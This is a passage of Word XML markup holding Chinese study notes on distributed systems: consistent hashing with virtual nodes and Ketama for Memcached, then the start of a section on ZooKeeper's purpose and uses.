        <w:t>命中各个节点的概率差别较大，无法实现有效的负载均衡。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1D34" w:rsidRPr="00F41A4C" w:rsidRDefault="002D1D34" w:rsidP="002D1D34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如有三个节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Node1,Node2,Node3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，分布在环上时三个节点挨的很近，落在环上的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>寻找节点时，大量</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>顺时针总是分配给</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Node2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，而其它两个节点被找到的概率都会很小。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1D34" w:rsidRPr="00F41A4C" w:rsidRDefault="002D1D34" w:rsidP="002D1D34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这种问题的解决方案可以有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1D34" w:rsidRPr="007B7A1A" w:rsidRDefault="002D1D34" w:rsidP="002D1D34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B7A1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>改善</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7A1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7A1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算法，均匀分配各节点到环上；［引文］使用虚拟节点的思想，为每个物理节点（服务器）在圆上分配</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7A1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7A1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>～</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7A1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7A1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个点。这样就能抑制分布不均匀，最大限度地减小服务器增减时的缓存重新分布。用户数据映射在虚拟节点上，就表示用户数据真正存储位置是在该虚拟节点代表的实际物理服务器上。</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7A1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1D34" w:rsidRPr="00F41A4C" w:rsidRDefault="002D1D34" w:rsidP="002D1D34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spy Memcached client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时，发现它采用一种称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ketama</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算法，以虚拟节点的思想，解决</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的分布式问题。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1D34" w:rsidRPr="00F41A4C" w:rsidRDefault="002D1D34" w:rsidP="002D1D34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>弄清楚了虚拟节点的问题后，我发现引入虚拟节点虽然使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的分布均衡了（有节点推出时，该节点上的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>也会均衡的分散到其它节点），而且仍然保持了一致性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1D34" w:rsidRPr="00F41A4C" w:rsidRDefault="002D1D34" w:rsidP="002D1D34">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参考资料</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId290" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://langyu.iteye.com/blog/684087</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A368BE" w:rsidRPr="00F41A4C" w:rsidRDefault="00A368BE" w:rsidP="00A368BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00066649" w:rsidRPr="00F41A4C" w:rsidRDefault="00066649" w:rsidP="00066649">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>理论</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA488D" w:rsidRPr="00F41A4C" w:rsidRDefault="00FA488D" w:rsidP="00A368BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA488D" w:rsidRPr="00F41A4C" w:rsidRDefault="001B7CA0" w:rsidP="00FA488D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00FA488D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.3 ZooKeeper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC548B" w:rsidRPr="00F41A4C" w:rsidRDefault="00EC548B" w:rsidP="00746C49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00C82798" w:rsidP="001358F7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="001358F7" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidR="00746C49" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00746C49" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是什么？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0F20" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00FB0F20">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>高性能，分布式的，开源分布式应用协调服务。它提供了简单原始的功能，分布式应用可以基于它实现更高级的服务，比如同步，配置管理，集群管理，名空间</w:t>
      </w:r>
      <w:r w:rsidR="00FB0F20">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0F20" w:rsidRPr="00F41A4C" w:rsidRDefault="00FB0F20" w:rsidP="00FB0F20">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分布式协调算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0F20" w:rsidRPr="00F41A4C" w:rsidRDefault="00FB0F20" w:rsidP="00FB0F20">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>一致性算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0F20" w:rsidRPr="00F41A4C" w:rsidRDefault="00FB0F20" w:rsidP="00FB0F20">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分布式锁</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>分布式环境中，相同业务分布在不同应用机器上</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>有些业务逻辑</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>耗时网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>I/O)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>只需让集群中某一台机器执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>其余机器可以共享结果，减少重复劳动</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>提高性能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0F20" w:rsidRPr="00F41A4C" w:rsidRDefault="00FB0F20" w:rsidP="00FB0F20">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>作为服务提供者注册中心</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0F20" w:rsidRPr="00FB0F20" w:rsidRDefault="00FB0F20" w:rsidP="00E2578C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00C82798" w:rsidP="00C82798">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidR="001358F7" w:rsidRPr="00F41A4C">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidR="00746C49" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746C49" w:rsidRPr="00F41A4C">
        <w:t>总体结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
